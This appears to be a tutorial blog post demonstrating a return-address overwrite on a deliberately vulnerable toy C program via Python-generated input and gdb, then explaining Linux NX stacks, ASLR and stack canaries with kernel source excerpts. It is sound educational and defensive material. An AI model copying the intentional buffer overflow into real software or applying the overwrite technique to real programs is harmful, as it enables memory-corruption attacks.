Classic Stack-Smashing
This is an example of a classic stack-smashing attack, and some discussion about associated mitigations in Linux.
Buffer-Overflow Bugs
First, we'll write some simple vulnerable code and compile it:
/* ex.c */
#include <unistd.h>
int foo() {
    char buffer[32];
    read(0, buffer, 512);
    return 0;
}

int main() {
    foo();
    return 0;
}
Here, the foo()
function allocates a 32-byte buffer, but then attempts to
read up to 512 bytes into it. This is a canonical buffer-overflow bug.
I find that Python is pretty useful for building nasty input in situations like this, so let's generate some to fill up this buffer:
""" gen.py """
#!/usr/bin/env python
with open('input', 'wb') as f:
f.write(b'\x41'*32)
Let's also look at the stack with gdb
and strategize a little. We'll set a
breakpoint right before we return from foo()
into the main function too.
It's important to note here that, as we add data after our 32 bytes of 0x41, our input is going to grow downwards in this representation.
(gdb) break *foo+30
Breakpoint 1 at 0x400779
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x0000000000400799
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
Now, the value immediately after our input at 0x7fffffffe890
represents the
saved base pointer of the previous frame (in this case, the base pointer for
the main function). This is not particularly interesting to us - however, after
this is the value of the return address at 0x7fffffffe898. When foo() returns,
our processor will set its instruction pointer -- the %rip
register on
64-bit x86 platforms -- to the value of the return address and continue execution
in the main function.
Because we can potentially write 512-32 = 480
bytes past the end of the buffer,
the bug affords us control over this return address, meaning that we have the ability
to break the normal flow of execution within the program.
Controlling Execution
Let's build input again, this time adding some bytes to write over the saved
%rbp
and the return address:
#!/usr/bin/env python
from struct import pack
with open('input', 'wb') as f:
    f.write(b'\x41' * 32 +
            pack("<Q", 0x7fffffffe8b0) +
            pack("<Q", 0xdeadbeef))
The calls to struct.pack
here are just for organizing our bytes
properly -- the <
just means "little-endian ordering" and Q
means
we're writing 8 bytes.
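As a quick sanity check, here's exactly what that call produces if you try it in a Python REPL:

```python
from struct import pack

# "<Q" packs an unsigned 64-bit integer in little-endian byte order,
# so the least-significant byte comes first in the output.
payload = pack("<Q", 0xdeadbeef)
print(payload)  # b'\xef\xbe\xad\xde\x00\x00\x00\x00'
```

Note that the value gets zero-extended to the full 8 bytes, which is what ends up overwriting the upper half of the return address.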
We append 8 bytes to overwrite the saved base pointer of the previous
frame (here just using the address from the gdb
output, although this
doesn't necessarily matter). Then, we'll write over the return address
with 0xdeadbeef
(which pack zero-extends to a full 8 bytes). Here's what it looks like when
we step through execution in gdb
again:
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x00000000deadbeef
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000deadbeef in ?? ()
Our application throws SIGSEGV
when execution attempts to return to the main
function. Perhaps the values at address 0xdeadbeef
don't contain any bytecode
for our processor to fetch, or maybe we've attempted some kind of illegal
memory access. Let's disassemble the main function for a moment while we
reconsider our choice:
0x0000000000400780 <+0>: 55 push %rbp
0x0000000000400781 <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000400784 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x0000000000400788 <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x000000000040078b <+11>: 48 89 75 f0 mov %rsi,-0x10(%rbp)
0x000000000040078f <+15>: b8 00 00 00 00 mov $0x0,%eax
0x0000000000400794 <+20>: e8 c2 ff ff ff callq 0x40075b <foo>
0x0000000000400799 <+25>: b8 00 00 00 00 mov $0x0,%eax
0x000000000040079e <+30>: c9 leaveq
0x000000000040079f <+31>: c3 retq
What if, instead of writing 0xdeadbeef
into %rip
, we wrote an address
of some other code in our binary? Let's try overwriting %rip
with
0x40078f
, which is the address in the .text
section of our program
right before we call foo()
in the main function!
Here's what execution looks like:
(gdb) run < input
...
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) x/10xg $rsp
0x7fffffffe870: 0x4141414141414141 0x4141414141414141
0x7fffffffe880: 0x4141414141414141 0x4141414141414141
0x7fffffffe890: 0x00007fffffffe8b0 0x000000000040078f
0x7fffffffe8a0: 0x00007fffffffe998 0x0000000100000000
0x7fffffffe8b0: 0x00000000004007a0 0x00007ffff7814511
(gdb) step
Single stepping until exit from function foo,
which has no line number information.
0x000000000040078f in main ()
(gdb) step
Single stepping until exit from function main,
which has no line number information.
Breakpoint 1, 0x0000000000400779 in foo ()
(gdb) cont
Continuing.
[Inferior 1 (process 5069) exited normally]
Notice how we entered our *foo+30
breakpoint twice! We wrote over %rip
with
the address of the instruction just before the call to foo()
in main. Upon
returning from foo()
, we just jumped backwards in the code to call foo()
again instead of continuing on with the main function.
Now, you might very reasonably start wondering:
"If we control the instruction pointer and have the ability to write all over the stack, what's preventing us from just writing bytecode at the beginning of that buffer and then executing it by writing over the return address with the address of the buffer?"
On modern platforms, there are actually a couple different things preventing us from just writing code on the stack and executing it. Here's a [probably non-exhaustive] list of the reasons why I haven't attempted this in the example above:
Non-Executable Stacks
First of all, modern processors have a feature which allows an operating system to mark particular pages of virtual memory as non-executable. For instance, I know that x86-64 reserves the highest-order bit of each page-table entry for use as the no-execute (NX) bit:
/* ~ arch/x86/includes/asm/pgtable_types.h @ linux-4.11.3 */
...
#define _PAGE_BIT_PRESENT 0 /* is present */
#define _PAGE_BIT_RW 1 /* writeable */
#define _PAGE_BIT_USER 2 /* userspace addressable */
#define _PAGE_BIT_PWT 3 /* page write through */
#define _PAGE_BIT_PCD 4 /* page cache disabled */
... ... ...
#define _PAGE_BIT_NX 63 /* No execute: only valid after cpuid check */
Modern GCC has the ability to compile and link your application such
that the stack is non-executable. One way you can see this is in
/proc/$pid/maps
entries, or in objdump
output:
$ cat /proc/$(pgrep ex1)/maps|grep stack
7ffd69ae9000-7ffd69b0a000 rw-p 00000000 00:00 0 [stack]
$ objdump -p bin/ex1|grep -A1 STACK
STACK off 0x0000000000000000 vaddr 0x0000000000000000 [...]
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
You can control this with the -z [no]execstack
GCC flag. Compare the
above output with this version of ex1.c
compiled with an executable
stack:
$ cat /proc/$(pgrep ex1-exec)/maps|grep stack
7fff07f11000-7fff07f32000 rwxp 00000000 00:00 0 [stack]
$ objdump -p bin/ex1-exec|grep -A1 STACK
STACK off 0x0000000000000000 vaddr 0x0000000000000000 [...]
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rwx
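As an aside, picking the [stack] permissions out of a maps file is just string parsing. A few lines of Python, using the sample line from the output above:

```python
def stack_perms(maps_text):
    """Return the permission field (e.g. 'rw-p') of the [stack] mapping."""
    for line in maps_text.splitlines():
        if line.rstrip().endswith("[stack]"):
            return line.split()[1]
    return None

sample = "7ffd69ae9000-7ffd69b0a000 rw-p 00000000 00:00 0 [stack]"
perms = stack_perms(sample)
print(perms, "x" in perms)  # rw-p False
```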
NX Stack: Implementation
The objdump
output comes from reading the program headers of
the binary. An ELF file contains instructions for how to build the image of some
process in memory -- each program header describes some properties of a segment,
and contains a p_flags
field which describes the associated permissions.
load_elf_binary()
in fs/binfmt_elf.c
is the kernel handler for ELF binaries.
This appears to be the code responsible for reading p_flags
and determining
whether or not the stack will be executable:
/* ~ fs/binfmt_elf.c:797 @ linux-4.11.3 */
...
for (i = 0; i < loc->elf_ex.e_phnum; i++, elf_ppnt++)
switch (elf_ppnt->p_type) {
case PT_GNU_STACK:
if (elf_ppnt->p_flags & PF_X)
executable_stack = EXSTACK_ENABLE_X;
else
executable_stack = EXSTACK_DISABLE_X;
break;
...
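The decision above is easy to model in Python. The constants below are the real ELF values, but the function is a toy that operates on pre-extracted (p_type, p_flags) pairs rather than a full ELF parser:

```python
PT_GNU_STACK = 0x6474e551      # program header type, as in elf.h
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

EXSTACK_DEFAULT, EXSTACK_DISABLE_X, EXSTACK_ENABLE_X = 0, 1, 2

def classify_stack(phdrs):
    """Mimic the PT_GNU_STACK case in load_elf_binary()."""
    for p_type, p_flags in phdrs:
        if p_type == PT_GNU_STACK:
            if p_flags & PF_X:
                return EXSTACK_ENABLE_X
            return EXSTACK_DISABLE_X
    return EXSTACK_DEFAULT     # no PT_GNU_STACK header: arch default

# An rw- GNU_STACK header, as produced by `-z noexecstack`:
print(classify_stack([(PT_GNU_STACK, PF_R | PF_W)]))  # 1
```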
Eventually, this code calls the setup_arg_pages()
function in fs/exec.c,
which passes this information into a call to mprotect_fixup().
/* ~ fs/exec.c:718 @ linux-4.11.3 */
...
/*
* Adjust stack execute permissions; explicitly enable for
* EXSTACK_ENABLE_X, disable for EXSTACK_DISABLE_X and leave alone
* (arch default) otherwise.
*/
if (unlikely(executable_stack == EXSTACK_ENABLE_X))
vm_flags |= VM_EXEC;
else if (executable_stack == EXSTACK_DISABLE_X)
vm_flags &= ~VM_EXEC;
vm_flags |= mm->def_flags;
vm_flags |= VM_STACK_INCOMPLETE_SETUP;
ret = mprotect_fixup(vma, &prev, vma->vm_start, vma->vm_end,
vm_flags);
...
Ultimately, contiguous regions of memory are described by vm_area_struct
(VMA) objects in the kernel. mprotect_fixup()
is the actual operation
responsible for setting permissions on the stack's VMA here with
vma->vm_flags = newflags.
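The flag arithmetic from setup_arg_pages() can be modeled directly. VM_EXEC and friends match their values in include/linux/mm.h, but the helper itself is just a sketch:

```python
VM_READ, VM_WRITE, VM_EXEC = 0x1, 0x2, 0x4   # as in include/linux/mm.h

EXSTACK_DEFAULT, EXSTACK_DISABLE_X, EXSTACK_ENABLE_X = 0, 1, 2

def stack_vm_flags(vm_flags, executable_stack):
    """Model the vm_flags adjustment in setup_arg_pages()."""
    if executable_stack == EXSTACK_ENABLE_X:
        vm_flags |= VM_EXEC
    elif executable_stack == EXSTACK_DISABLE_X:
        vm_flags &= ~VM_EXEC
    # EXSTACK_DEFAULT: leave alone (arch default)
    return vm_flags

flags = VM_READ | VM_WRITE | VM_EXEC
print(stack_vm_flags(flags, EXSTACK_DISABLE_X) & VM_EXEC)  # 0
```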
Presumably the permissions on VMAs have some bearing on the permissions associated with underlying pages, although this is kind of unclear to me at the moment.
Randomization
On modern platforms, base addresses for memory allocations are randomized by an operating-system feature called ASLR (for Address Space Layout Randomization). Observe this code:
/* ex2.c */
#include <unistd.h>
#include <stdio.h>
int foo() {
    char buffer[512];
    printf("buffer is at %p\n", &buffer);
    read(0, buffer, 2048);
    return 0;
}

int main() {
    foo();
    return 0;
}
If we run this a couple times, you'll notice that the address of char buffer[512]
is not fixed in any sense:
$ for i in {0..10..1}; do ./ex2 <<<"foo"; done
buffer is at 0x7fff0d7a64e0
buffer is at 0x7ffccd9451e0
buffer is at 0x7ffd2b1bd210
buffer is at 0x7ffd92dca5b0
buffer is at 0x7ffe4df69740
buffer is at 0x7ffc95787d00
buffer is at 0x7ffc9a42a860
buffer is at 0x7ffee99e5110
buffer is at 0x7ffe10df6430
buffer is at 0x7fff625094d0
buffer is at 0x7ffe95630e10
Say that you had written a bunch of nasty bytecode onto the stack, had
control over the instruction pointer, and even had an executable stack
to work with. In order to point %rip
at some bytecode
in our input, we'd need to know the starting address of that input beforehand.
The position of our program's .text
section in memory is perfectly
deterministic, which is why breaking the flow of execution was easy in the
first example. Here, it's not so simple. The most obvious strategy here
would be to try addresses at random, but the entropy in those addresses makes brute force slow and conspicuous.
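To get a rough feel for how much entropy we're up against, we can XOR the sampled buffer addresses above against each other -- any bit that differs across samples is a bit we'd have to guess:

```python
# Buffer addresses observed from the ex2 runs above.
addrs = [
    0x7fff0d7a64e0, 0x7ffccd9451e0, 0x7ffd2b1bd210, 0x7ffd92dca5b0,
    0x7ffe4df69740, 0x7ffc95787d00, 0x7ffc9a42a860, 0x7ffee99e5110,
    0x7ffe10df6430, 0x7fff625094d0, 0x7ffe95630e10,
]

# OR together the XORs against the first sample: a set bit in `varying`
# means that bit differed in at least one run.
varying = 0
for a in addrs[1:]:
    varying |= a ^ addrs[0]

print(bin(varying).count("1"))  # number of bits observed to vary
```

Eleven samples only give a lower bound, of course, but it's already enough to make blind guessing look unpleasant.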
At this point, you might consider that there are other sections of our program to target that are executable. [Un]fortunately, the bases of those sections are probably randomized too! For example, shared libraries:
$ for i in {0..10..1}; do ldd ex2 | grep libc; done
libc.so.6 => /usr/lib/libc.so.6 (0x00007f154ff10000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007ff3db6e5000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe8e9022000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fa4f4469000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fb632b44000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f5f666cd000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe732fff000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f67170b0000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f5dbfdd7000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fe710a38000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f3e710b4000)
Address-Space Randomization: Implementation
Again, we're back in fs/binfmt_elf.c
. Looks like the handler for ELF
binaries (load_elf_binary()
, in case you forgot) sets current->flags
accordingly for the new process. The PF_RANDOMIZE
flag designates that
the virtual address space of the process will be randomized when it
is initialized.
/* ~ fs/binfmt_elf.c:867 @ linux-4.11.3 */
...
if(!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
current->flags |= PF_RANDOMIZE;
setup_new_exec(bprm);
...
In the same file, randomize_stack_top()
is called to suitably randomize the
top of the stack (immediately before calling setup_arg_pages()
as described in the previous section -- this function also adds some randomness).
Early in setup_new_exec()
, the mm->mmap_legacy_base
field in the memory
descriptor is randomized by calling arch_pick_mmap_layout()
in
arch/x86/mm/mmap.c
. It also looks like that function randomizes the gaps
between allocations.
arch_mmap_rnd()
is the actual function that generates random numbers for
the offsets with get_random_long()
.
Immediately after this, load_elf_binary()
has to loop through and map the
rest of the sections into memory while adding random offsets to the base
addresses. This piece appears to randomize offsets for shared sections:
/* ~ fs/binfmt_elf.c:873 @ linux-4.11.3 */
...
/* Now we do a little grungy work by mmapping the ELF image into
the correct location in memory. */
for(i = 0, elf_ppnt = elf_phdata;
i < loc->elf_ex.e_phnum; i++, elf_ppnt++) {
...
} else if (loc->elf_ex.e_type == ET_DYN) {
...
load_bias = ELF_ET_DYN_BASE - vaddr;
if (current->flags & PF_RANDOMIZE)
load_bias += arch_mmap_rnd();
...
... and later, the data segment is randomized too via arch_randomize_brk()
in arch/x86/kernel/process.c
(which is basically just a wrapper around
randomize_page()
in drivers/char/random.c):
/* ~ fs/binfmt_elf.c:1077 @ linux-4.11.3 */
...
if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
current->mm->brk = current->mm->start_brk =
arch_randomize_brk(current->mm);
...
In case you're unfamiliar, randomize_va_space
here refers to the name of
the sysctl
parameter used to control address space randomization (which
is usually turned on to some degree by default).
/* ~ Documentation/sysctl/kernel.txt */
...
randomize_va_space:
This option can be used to select the type of process address
space randomization that is used in the system, for architectures
that support this feature.
0 - Turn the process address space randomization off. This is the
default for architectures that do not support this feature anyways,
and kernels that are booted with the "norandmaps" parameter.
1 - Make the addresses of mmap base, stack and VDSO page randomized.
This, among other things, implies that shared libraries will be
loaded to random addresses. Also for PIE-linked binaries, the
location of code start is randomized. This is the default if the
CONFIG_COMPAT_BRK option is enabled.
2 - Additionally enable heap randomization. This is the default if
CONFIG_COMPAT_BRK is disabled.
There are a few legacy applications out there (such as some ancient
versions of libc.so.5 from 1996) that assume that brk area starts
just after the end of the code+bss. These applications break when
start of the brk area is randomized. There are however no known
non-legacy applications that would be broken this way, so for most
systems it is safe to choose full randomization.
Systems with ancient and/or broken binaries should be configured
with CONFIG_COMPAT_BRK enabled, which excludes the heap from process
address space randomization.
Stack Canaries
One simple way of mitigating the threat of stack-smashing is to compile your
application with GCC's -fstack-protector
flag, e.g.
$ make ex1-stack-protector
gcc ex1.c -o ../bin/ex1-stack-protector -fstack-protector
$ ./bin/ex1-stack-protector < input
*** stack smashing detected ***: ./bin/ex1-stack-protector terminated
...
Aborted (core dumped)
Our program just aborts now, but how is this accomplished?
Let's see what gdb
has to say about this after we feed it some harmless
input (only 32 bytes):
$ gdb -batch -ex 'file bin/ex1-stack-protector' -ex 'break *foo+45' \
> -ex 'run < input' -ex 'x/10xg $rsp' -ex 'disas main'
Breakpoint 1 at 0x400593
Breakpoint 1, 0x0000000000400593 in foo ()
0x7fffffffdf70: 0x4141414141414141 0x4141414141414141
0x7fffffffdf80: 0x4141414141414141 0x4141414141414141
0x7fffffffdf90: 0x00000000004005d0 0xa719e95716303300
0x7fffffffdfa0: 0x00007fffffffdfb0 0x00000000004005bc
0x7fffffffdfb0: 0x00000000004005d0 0x00007ffff7a56511
Dump of assembler code for function main:
0x00000000004005ae <+0>: push %rbp
0x00000000004005af <+1>: mov %rsp,%rbp
0x00000000004005b2 <+4>: mov $0x0,%eax
0x00000000004005b7 <+9>: callq 0x400566 <foo>
0x00000000004005bc <+14>: mov $0x0,%eax
0x00000000004005c1 <+19>: pop %rbp
0x00000000004005c2 <+20>: retq
End of assembler dump.
It looks like the boundary between the two frames has changed slightly!
Here, 0x7fffffffdfa8
contains the return address which points %rip
back into the main function. It seems like GCC has padded the space
between the buffer and the previous frame with a few bytes.
The 8-byte value 0xa719e95716303300
before the saved base pointer and
return address is called the stack canary. This is the mechanism that
-fstack-protector
uses to detect stack-smashing. In order to see how,
we'll write past the buffer with 64 bytes this time and look at the
disassembly for foo()
in gdb
again. First, some input:
#!/usr/bin/env python
from struct import pack
with open('input', 'wb') as f:
    f.write(b'\x41' * 40 +                    # fill buffer + padding
            pack("<Q", 0xbbbbbbbbbbbbbbbb) +  # write over canary
            pack("<Q", 0xcccccccccccccccc) +  # write over saved base
            pack("<Q", 0x4005b2))             # write over return addr
Adding the flag has changed the behaviour of foo()
to some degree.
By default, -fstack-protector
changes the prologue and epilogue of
functions that (a) allocate buffers >8 bytes on the stack; and/or (b)
call alloca()
(for explicitly allocating memory on the stack).
Here's what it looks like now:
Dump of assembler code for function foo:
0x0000000000400566 <+0>: push %rbp
0x0000000000400567 <+1>: mov %rsp,%rbp
0x000000000040056a <+4>: sub $0x30,%rsp
+ 0x000000000040056e <+8>: mov %fs:0x28,%rax
+ 0x0000000000400577 <+17>: mov %rax,-0x8(%rbp)
+ 0x000000000040057b <+21>: xor %eax,%eax
0x000000000040057d <+23>: lea -0x30(%rbp),%rax
0x0000000000400581 <+27>: mov $0x200,%edx
0x0000000000400586 <+32>: mov %rax,%rsi
0x0000000000400589 <+35>: mov $0x0,%edi
0x000000000040058e <+40>: callq 0x400460 <read@plt>
0x0000000000400593 <+45>: mov $0x0,%eax
+ 0x0000000000400598 <+50>: mov -0x8(%rbp),%rcx
+ 0x000000000040059c <+54>: xor %fs:0x28,%rcx
+ 0x00000000004005a5 <+63>: je 0x4005ac <foo+70>
+ 0x00000000004005a7 <+65>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005ac <+70>: leaveq
0x00000000004005ad <+71>: retq
End of assembler dump.
And these new instructions are used to set up and check the canary on the stack:
mov %fs:0x28,%rax ; Put canary value in $rax
mov %rax,-0x8(%rbp) ; Put canary value on the stack
xor %eax,%eax ; Clear $rax
... ... ; Your function goes here
mov -0x8(%rbp),%rcx ; Read the canary value on the stack
xor %fs:0x28,%rcx ; xor with known-good value
je 0x4005ac <foo+70> ; if 0, continue execution
callq 0x400450 <__stack_chk_fail@plt> ; otherwise, abort
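The whole mechanism can be simulated in a few lines of Python. The frame layout (40 bytes of buffer plus alignment padding, then the canary) loosely matches the disassembly above, but everything else here is a toy model rather than how the real check is implemented:

```python
import os

def run_frame(user_input):
    """Toy model of foo()'s frame: 40 bytes (buffer + padding), then canary."""
    canary = os.urandom(8)          # stands in for the value at %fs:0x28
    frame = bytearray(40) + canary  # the bytes sitting below the saved %rbp

    # The overflowing read(0, buffer, 512): input may run past the
    # buffer and into the canary slot.
    n = min(len(user_input), len(frame))
    frame = user_input[:n] + frame[n:]

    # Function epilogue: compare the stored canary with the known-good value.
    if frame[40:48] != canary:
        raise RuntimeError("*** stack smashing detected ***")
    return 0

print(run_frame(b"A" * 40))   # fills the buffer exactly: prints 0
try:
    run_frame(b"A" * 64)      # runs over the canary
except RuntimeError as e:
    print(e)                  # *** stack smashing detected ***
```

Because the canary is random and sits between the buffer and the saved registers, a linear overwrite can't reach the return address without disturbing it.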
Stack Canaries: Implementation
It looks like there's a stack canary field in
task_struct. You can see a call to get_random_long()
in kernel/fork.c:
/* ~ kernel/fork.c:533 @ linux-4.11.3 */
...
setup_thread_stack(tsk, orig);
clear_user_return_notifier(tsk);
clear_tsk_need_resched(tsk);
set_task_stack_end_magic(tsk);
#ifdef CONFIG_CC_STACKPROTECTOR
tsk->stack_canary = get_random_long();
#endif
...
And from the task_struct
definition in include/linux/sched.h:
/* ~ include/linux/sched.h:483 @ linux-4.11.3 */
#ifdef CONFIG_CC_STACKPROTECTOR
/* Canary value for the -fstack-protector GCC feature: */
unsigned long stack_canary;
#endif
The value is actually initialized in init/main.c
in the
start_kernel()
function by calling boot_init_stack_canary()
from arch/x86/include/asm/stackprotector.h
. This happens when
the kernel starts:
/* ~ arch/x86/include/asm/stackprotector.h:60 @ linux-4.11.3 */
...
static __always_inline void boot_init_stack_canary(void)
{
u64 canary;
u64 tsc;
#ifdef CONFIG_X86_64
BUILD_BUG_ON(offsetof(union irq_stack_union, stack_canary) != 40);
#endif
/*
* We both use the random pool and the current TSC as a source
* of randomness. The TSC only matters for very early init,
* there it already has some randomness on most systems. Later
* on during the bootup the random pool has true entropy too.
*/
get_random_bytes(&canary, sizeof(canary));
tsc = rdtsc();
canary += tsc + (tsc << 32UL);
current->stack_canary = canary;
#ifdef CONFIG_X86_64
this_cpu_write(irq_stack_union.stack_canary, canary);
#else
this_cpu_write(stack_canary.canary, canary);
#endif
}
...
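One detail worth noting in that function: canary is a u64, so both the tsc << 32 shift and the addition wrap at 64 bits. Modeling the mixing in Python requires an explicit mask (the inputs below are made up, standing in for get_random_bytes() and rdtsc()):

```python
MASK = (1 << 64) - 1  # u64 arithmetic wraps modulo 2**64

def boot_canary(pool_randomness, tsc):
    """Model the mixing in boot_init_stack_canary():
    canary += tsc + (tsc << 32), all mod 2**64."""
    return (pool_randomness + tsc + (tsc << 32)) & MASK

# Made-up inputs for illustration:
print(hex(boot_canary(0x0123456789abcdef, 0x1000)))
```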
Presumably this is related to how the references to %fs:0x28
in the disassembly work -- although note that the header below describes
the kernel's own stack protector; for userland binaries, glibc keeps the
canary in thread-local storage (reached through %fs on x86-64), seeded
from the AT_RANDOM bytes the kernel supplies at exec time. I actually
don't know the finer details of how the segment registers work, so I
guess I ought to let stackprotector.h
speak for itself here:
/*
* GCC stack protector support.
*
* Stack protector works by putting predefined pattern at the start of
* the stack frame and verifying that it hasn't been overwritten when
* returning from the function. The pattern is called stack canary
* and unfortunately gcc requires it to be at a fixed offset from %gs.
* On x86_64, the offset is 40 bytes and on x86_32 20 bytes. x86_64
* and x86_32 use segment registers differently and thus handles this
* requirement differently.
*
* On x86_64, %gs is shared by percpu area and stack canary. All
* percpu symbols are zero based and %gs points to the base of percpu
* area. The first occupant of the percpu area is always
* irq_stack_union which contains stack_canary at offset 40. Userland
* %gs is always saved and restored on kernel entry and exit using
* swapgs, so stack protector doesn't add any complexity there.
*
* On x86_32, it's slightly more complicated. As in x86_64, %gs is
* used for userland TLS. Unfortunately, some processors are much
* slower at loading segment registers with different value when
* entering and leaving the kernel, so the kernel uses %fs for percpu
* area and manages %gs lazily so that %gs is switched only when
* necessary, usually during task switch.
*
* As gcc requires the stack canary at %gs:20, %gs can't be managed
* lazily if stack protector is enabled, so the kernel saves and
* restores userland %gs on kernel entry and exit. This behavior is
* controlled by CONFIG_X86_32_LAZY_GS and accessors are defined in
* system.h to hide the details.
*/
Topics for Next Time
I think the next post might actually proceed with exploitation in the face of some of the mitigations explored here (probably not all of them at once). There will most likely be some discussion about ret2libc, and potentially some really bad attempts at return-oriented programming (although we'll see how that goes).